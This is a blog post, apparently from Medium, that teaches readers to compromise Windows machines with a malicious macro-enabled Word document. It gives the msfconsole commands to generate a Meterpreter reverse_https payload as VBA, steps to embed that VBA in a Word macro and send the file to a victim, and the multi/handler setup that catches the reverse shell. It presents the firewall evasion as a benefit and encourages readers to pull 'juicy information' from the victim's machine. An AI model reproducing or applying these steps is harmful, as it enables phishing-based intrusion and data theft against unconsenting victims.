How to hack windows with .doc file create macro Payload using kali linux 2021 latest

In our pervious blog we have discussed about how we can create windows payload using kali linux, but creating reverse_tcp payload is not that effective and also doesn’t runs on many of the latest windows OS.

This time we will try using a different metasploit payload to gain remote access to windows machine. The Payload we will be using is windows/meterpreter/reverse_https.

You might ask what’s the difference between reverse_tcp and reverse_https, well there is not much difference Since both is coming from the victim computer back to the attacker. Which means the firewall think it’s fine since the victim started the connection. The only different is probably that the HTTPS one go via the port 443, which makes it looks like encrypted website requests and communication.

The reverse_https payload is used when there are some firewalls restrictions. The reverse_ https meterpreter payload is like a standard meterpreter payload, infact if you trying sniffing it with wireshark, it looks like normal HTTPS traffic.

So what are we going to do is we will create a reverse_https payload and then generate a vba script and then embed that vba script to a macro enabled document, and then we will send that macro document to a victim as he/she opens the macro enabled document we will get our meterpreter sesission UP and running.

What is Macro Enabled Document?

In Word, you can automate frequently used tasks by creating and running macros. A macro is a series of commands and instructions that you group together as a single command to accomplish a task automatically. To save time on tasks you do often, bundle the steps into a macro.

Step 1: Create a reverse_https payload

To create a reverse_https payload open msfconsole by typing msfconsole in a terminal window.

Once you’ve opened you msfconsole type the below commands :

use windows/meterpreter/reverse_https
set PAYLOAD windows/meterpreter/reverse_https
set LHOST Your_IP_Address
set LPORT 443
set AutoRunScript post/windows/manager/smart_migrate
generate -f vba

If you’ve typed the above commands correct you might have got a long code written below generate -f vba command, well if you got so you have successfully created vba script. If not refer to below image and check whether you’ve typed commands properly.

Step 2: Creation of Macro Enabled Document

Now just copy all the output you got and create a Microsoft word document.

Now, when you open new doc got to > View > Click on Macro.

you will get something similar to the image below.

Enter the name of macro under Macro name tab click on Macros in dropdown list and select Document 1.

Now click on Create, you will redirect to macro command interface, now paste all the command you’ve copied from our metasploit output in it.

Now save the file as macro enabled document(IMP).

Step 3: Setting up the session

Once you have created the macro enabled document, send it to the victim by the time you send it to the victim, we have to create a metasploit payload in order to create a session.

To do so type the following commands:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST your_ip
set LPORT 443

Once you’ve entered above commands just wait for victim to open you document, as he/she opens the document our macro command will start executing and we will get our meterpreter shell established, now you know what can you do with that!!!

Here’s the video Demonstration:

But getting session open is like winning a battle, we want to win the war to do so we will upload a backdoor, escalate privilege’s and also we will migrate our shell to a persistent location, but we will do all this in our upcoming blog by the time explore victims machine gather information and try dumping some juicy information and let me know what information you got in the comment box.

Happy Hacking !!!

Keep Coming for more .



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store



Hey Hackers !! I am Harshit Dodia aka Freaky Dodo , I am a student of Information Technology and Ethical hacking.